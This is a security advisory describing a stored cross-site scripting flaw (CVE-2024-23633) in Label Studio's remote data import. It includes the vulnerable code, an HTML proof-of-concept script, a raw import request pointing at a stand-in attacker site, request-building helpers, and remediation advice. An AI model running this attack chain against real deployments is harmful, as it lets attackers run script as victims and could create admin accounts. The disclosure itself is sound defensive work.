Cross-site Scripting Vulnerability on Data Import
GHSA-fq23-g58m-799r · CVE-2024-23633 · PYSEC-2024-128
Description
Introduction
This write-up describes a vulnerability found in Label Studio, a popular open-source data labeling tool. The vulnerability affects all versions of Label Studio prior to 1.10.1 and was tested on version 1.9.2.post0.
Overview
Label Studio had a remote import feature that allowed users to import data from a remote web source; the data was downloaded and could then be viewed on the website. This feature could have been abused to download an HTML file that executed malicious JavaScript code in the context of the Label Studio website.
Description
The following code snippet from Label Studio showed that, if a URL passed the SSRF verification checks, the contents of the file would be downloaded and saved under the filename taken from the URL.
```python
def tasks_from_url(file_upload_ids, project, user, url, could_be_tasks_list):
    """Download file using URL and read tasks from it"""
    # process URL with tasks
    try:
        filename = url.rsplit('/', 1)[-1]  # <1>
        response = ssrf_safe_get(
            url, verify=project.organization.should_verify_ssl_certs(), stream=True, headers={'Accept-Encoding': None}
        )
        file_content = response.content
        check_tasks_max_file_size(int(response.headers['content-length']))
        file_upload = create_file_upload(user, project, SimpleUploadedFile(filename, file_content))
        if file_upload.format_could_be_tasks_list:
            could_be_tasks_list = True
        file_upload_ids.append(file_upload.id)
        tasks, found_formats, data_keys = FileUpload.load_tasks_from_uploaded_files(project, file_upload_ids)
    except ValidationError as e:
        raise e
    except Exception as e:
        raise ValidationError(str(e))
    return data_keys, found_formats, tasks, file_upload_ids, could_be_tasks_list
```
- <1> The filename was set to everything after the last `/` in the user-supplied URL.
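To illustrate the filename derivation marked <1>, the minimal sketch below contrasts the `rsplit` expression from the snippet with a variant that parses the URL first. Both helper names are hypothetical. Because `rsplit` works on the raw string, text from the query string can also become the stored filename; parsing alone would not fix the vulnerability (an attacker controls the URL path as well), it only shows that the stored name, and therefore its extension, is fully attacker-controlled.

```python
from pathlib import PurePosixPath
from urllib.parse import urlsplit


def filename_from_url_rsplit(url: str) -> str:
    """Mirror of the vulnerable expression: everything after the last '/'."""
    return url.rsplit('/', 1)[-1]


def filename_from_url_path(url: str) -> str:
    """Hypothetical variant: last segment of the parsed URL path only."""
    return PurePosixPath(urlsplit(url).path).name


for url in (
    "https://evil.example/xss.html",
    "https://evil.example/data?name=/xss.html",
):
    # Print the name each approach would store for the same URL.
    print(url, "->", filename_from_url_rsplit(url), "|", filename_from_url_path(url))
```

For the second URL, the `rsplit` form yields `xss.html` while the parsed form yields `data`.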
The path of the downloaded file could then be retrieved by sending a request to `/api/projects/{project_id}/file-uploads?ids=[{download_id}]`, where `{project_id}` was the ID of the project and `{download_id}` was the ID of the downloaded file. When that path was then requested, the following code snippet showed that the `Content-Type` of the response was determined by the file extension, since `mimetypes.guess_type` guesses the type based on the extension.
```python
class UploadedFileResponse(generics.RetrieveAPIView):
    permission_classes = (IsAuthenticated,)

    @swagger_auto_schema(auto_schema=None)
    def get(self, *args, **kwargs):
        request = self.request
        filename = kwargs['filename']
        # XXX needed, on windows os.path.join generates '\' which breaks FileUpload
        file = settings.UPLOAD_DIR + ('/' if not settings.UPLOAD_DIR.endswith('/') else '') + filename
        logger.debug(f'Fetch uploaded file by user {request.user} => {file}')
        file_upload = FileUpload.objects.filter(file=file).last()

        if not file_upload.has_permission(request.user):
            return Response(status=status.HTTP_403_FORBIDDEN)

        file = file_upload.file
        if file.storage.exists(file.name):
            content_type, encoding = mimetypes.guess_type(str(file.name))  # <1>
            content_type = content_type or 'application/octet-stream'
            return RangedFileResponse(request, file.open(mode='rb'), content_type=content_type)
        else:
            return Response(status=status.HTTP_404_NOT_FOUND)
```
- <1> Determines the `Content-Type` based on the extension of the uploaded file by using `mimetypes.guess_type`.
Since the `Content-Type` was determined by the file extension of the downloaded file, an attacker could import an `.html` file that would execute JavaScript when visited.
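The extension-to-type mapping can be checked directly with the standard library. This minimal sketch reproduces the view's logic, `mimetypes.guess_type` plus the `application/octet-stream` fallback, in a hypothetical helper `served_content_type`; the stored path `upload/1/cfcfc340-xss.html` comes from the proof of concept, and the unknown-extension filename is made up for contrast.

```python
import mimetypes


def served_content_type(stored_name: str) -> str:
    """Same decision as the view: guess from the extension, else fall back."""
    content_type, _encoding = mimetypes.guess_type(stored_name)
    return content_type or 'application/octet-stream'


# An imported .html file is served as text/html, so the browser renders it
# and runs its scripts in the Label Studio origin.
print(served_content_type('upload/1/cfcfc340-xss.html'))

# An unrecognised extension falls back to application/octet-stream, which
# browsers typically offer as a download rather than render.
print(served_content_type('upload/1/cfcfc340-tasks.xyzunknown'))
```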
Proof of Concept
Below are the steps to reproduce this issue:
- Host the following HTML proof of concept (POC) script on an external website, using the file extension `.html`, so that it would be downloaded to the Label Studio website.
```html
<html>
  <body>
    <h1>Data Import XSS</h1>
    <script>
      alert(document.domain);
    </script>
  </body>
</html>
```
- Send the following `POST` request to download the HTML POC to the Label Studio server, and note the ID of the downloaded file returned in the response. In this POC, `{victim_host}` is the address and port of the victim Label Studio website (e.g. `labelstudio.com:8080`), `{project_id}` is the ID of the project the data will be imported into, `{cookies}` are the session cookies, and `{evil_site}` is the website hosting the malicious HTML file (named `xss.html` in this example).
```http
POST /api/projects/{project_id}/import?commit_to_project=false HTTP/1.1
Host: {victim_host}
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Content-Length: 43
Connection: close
Cookie: {cookies}
Pragma: no-cache
Cache-Control: no-cache

url=https://{evil_site}/xss.html
```
- Retrieve the path of the downloaded file by sending a `GET` request to `/api/projects/{project_id}/file-uploads?ids=[{download_id}]`, where `{download_id}` is the ID of the downloaded file from the previous step.
- Send your victim a link to `/data/{file_path}`, where `{file_path}` is the path of the downloaded file from the previous step. A screenshot taken during testing demonstrated the POC JavaScript code executing when `/data/upload/1/cfcfc340-xss.html` was visited.
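For retesting a patched instance, the request-building part of these steps can be scripted. The sketch below only constructs the import request, the file-uploads lookup URL, and the victim link with the standard library's `urllib`; it sends nothing. The helper names, the `http` scheme default, and the sample host, project ID, and cookie values are assumptions, and because the shape of the file-uploads API response is not described here, the stored file path is passed in by hand.

```python
from urllib.parse import urlencode
from urllib.request import Request


def build_import_request(victim_host: str, project_id: int, cookies: str,
                         evil_url: str, scheme: str = "http") -> Request:
    """POST the remote URL to the import endpoint without committing tasks."""
    body = urlencode({"url": evil_url}).encode()
    return Request(
        f"{scheme}://{victim_host}/api/projects/{project_id}/import?commit_to_project=false",
        data=body,
        headers={"Content-Type": "application/x-www-form-urlencoded", "Cookie": cookies},
        method="POST",
    )


def build_file_uploads_url(victim_host: str, project_id: int, download_id: int,
                           scheme: str = "http") -> str:
    """URL that looks up the stored path of the downloaded file by its ID."""
    query = urlencode({"ids": f"[{download_id}]"})
    return f"{scheme}://{victim_host}/api/projects/{project_id}/file-uploads?{query}"


def build_victim_link(victim_host: str, file_path: str, scheme: str = "http") -> str:
    """Link that serves the stored file back with a guessed Content-Type."""
    return f"{scheme}://{victim_host}/data/{file_path}"


req = build_import_request("labelstudio.com:8080", 1, "sessionid=example",
                           "https://evil.example/xss.html")
print(req.get_method(), req.full_url, req.data)
print(build_file_uploads_url("labelstudio.com:8080", 1, 1))
print(build_victim_link("labelstudio.com:8080", "upload/1/cfcfc340-xss.html"))
```

`urlencode` percent-encodes the form body and the `[1]` query value, unlike the raw request shown above; a server decoding standard form and query encoding sees the same values either way.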

Impact
Executing arbitrary JavaScript could allow an attacker to perform malicious actions on behalf of Label Studio users who visit the crafted file. For example, an attacker could craft a JavaScript payload that adds a new Django Super Administrator user when a Django administrator visits the page.
Remediation Advice
- For all user-provided files that are downloaded by Label Studio, set the `Content-Security-Policy: sandbox;` response header when they are viewed on the site. The `sandbox` directive restricts a page's actions to prevent popups and the execution of plugins and scripts, and enforces a same-origin policy (see the MDN `sandbox` documentation in the References).
- Restrict the allowed file extensions that could be downloaded.
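A minimal, framework-agnostic sketch of both recommendations follows. The extension allowlist is hypothetical (the formats Label Studio actually accepts may differ), and the helpers only compute an import decision and a header dictionary; wiring them into the real Django import and file-serving views is not shown.

```python
import mimetypes
from pathlib import PurePosixPath

# Hypothetical allowlist of extensions accepted for remote import.
# The real set of formats Label Studio supports may differ.
ALLOWED_IMPORT_EXTENSIONS = {".csv", ".tsv", ".txt", ".json", ".jsonl"}


def is_allowed_import(filename: str) -> bool:
    """Reject downloads whose extension is not on the allowlist (case-insensitive)."""
    return PurePosixPath(filename).suffix.lower() in ALLOWED_IMPORT_EXTENSIONS


def user_file_headers(stored_name: str) -> dict[str, str]:
    """Response headers for serving a user-provided file with a CSP sandbox."""
    content_type, _encoding = mimetypes.guess_type(stored_name)
    return {
        "Content-Type": content_type or "application/octet-stream",
        # With no allow-* tokens, the browser treats the response as a
        # sandboxed document: scripts, plugins and popups are blocked.
        "Content-Security-Policy": "sandbox;",
    }
```

The two measures are complementary: the allowlist stops the `.html` file from being stored at import time, and the header limits what any file that still gets through can do when it is served.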
Discovered
- August 2023, Alex Brown, elttam
References
- WEB https://github.com/HumanSignal/label-studio/security/advisories/GHSA-fq23-g58m-799r
- ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2024-23633
- WEB https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox
- PACKAGE https://github.com/HumanSignal/label-studio
- WEB https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/api.py#L595C1-L616C62
- WEB https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/uploader.py#L125C5-L146
- WEB https://github.com/pypa/advisory-database/tree/main/vulns/label-studio/PYSEC-2024-128.yaml